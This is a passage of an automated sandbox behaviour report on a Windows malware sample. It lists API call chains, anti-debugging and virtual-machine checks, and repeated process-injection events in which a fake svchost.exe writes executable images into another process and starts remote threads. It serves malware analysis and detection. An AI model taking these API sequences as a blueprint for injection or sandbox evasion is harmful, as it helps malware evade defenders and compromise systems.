    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02557680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_02557680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0256E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0256E6B0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,8_2_025EDA50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025EDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,8_2_025EDAE8
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025E9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,8_2_025E9910
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DD120
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C7680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_025C7680
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025DE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_025DE6B0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CBE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,1_2_02CBE0FB
    Source: C:\Windows\apppatch\svchost.exe Thread delayed: delay time: 922337203685477
    Source: 5AFlyarMds.exe, 00000000.00000002.1740521806.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pindows\system\vmhgfs.DLLrM
    Source: 5AFlyarMds.exe, 00000000.00000002.1740521806.000000000068E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: irs\user\Desktop\vmhgfs.l
    Source: svchost.exe, 00000001.00000003.2477919683.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2501299413.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2793808269.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2629381703.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2709512878.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2768207136.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2784321993.0000000000891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000001.00000002.2973986675.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(t
    Source: svchost.exe, 00000001.00000002.2974475260.0000000000885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWRSVP UDP Service Provider
    Source: C:\Windows\apppatch\svchost.exe API call chain: ExitProcess graph end nodegraph_1-65375
    Source: C:\Windows\apppatch\svchost.exe Process information queried: ProcessInformation
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F779D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_02F779D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,1_2_02CA78A0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]1_2_00406800
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406B60 mov eax, dword ptr fs:[00000030h]1_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]1_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1360 mov eax, dword ptr fs:[00000030h]1_2_029B1360
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1360 mov edx, dword ptr fs:[00000030h]1_2_029B1360
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_029B1000 mov eax, dword ptr fs:[00000030h]1_2_029B1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1360 mov eax, dword ptr fs:[00000030h]5_2_015E1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1360 mov edx, dword ptr fs:[00000030h]5_2_015E1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_015E1000 mov eax, dword ptr fs:[00000030h]5_2_015E1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1360 mov eax, dword ptr fs:[00000030h]6_2_023F1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1360 mov edx, dword ptr fs:[00000030h]6_2_023F1360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_023F1000 mov eax, dword ptr fs:[00000030h]6_2_023F1000
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521360 mov eax, dword ptr fs:[00000030h]8_2_02521360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521360 mov edx, dword ptr fs:[00000030h]8_2_02521360
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_02521000 mov eax, dword ptr fs:[00000030h]8_2_02521000
    Source: C:\Users\user\Desktop\5AFlyarMds.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,FindCloseChangeNotification,IsBadWritePtr,0_2_00401150

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\apppatch\svchost.exe Memory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E0000 protect: page execute and read and write
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1400000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2330000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D90000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F20000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2880000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2740000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2930000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1570000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 26B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 27B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 520000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 24E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3060000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D00000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D80000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3070000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C60000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2250000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Users\user\Desktop\5AFlyarMds.exe Code function: 0_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_00401670 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CB4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 5_2_02F84CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 6_2_02574CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe Code function: 8_2_025E4CC0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2522000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2482000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 22D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E42000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 892000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exe Memory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 15E0000
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2EC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 800000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 801000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 802000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 855000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2610000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2611000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2612000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2665000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1060000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1061000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1062000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10B5000Jump to behavior
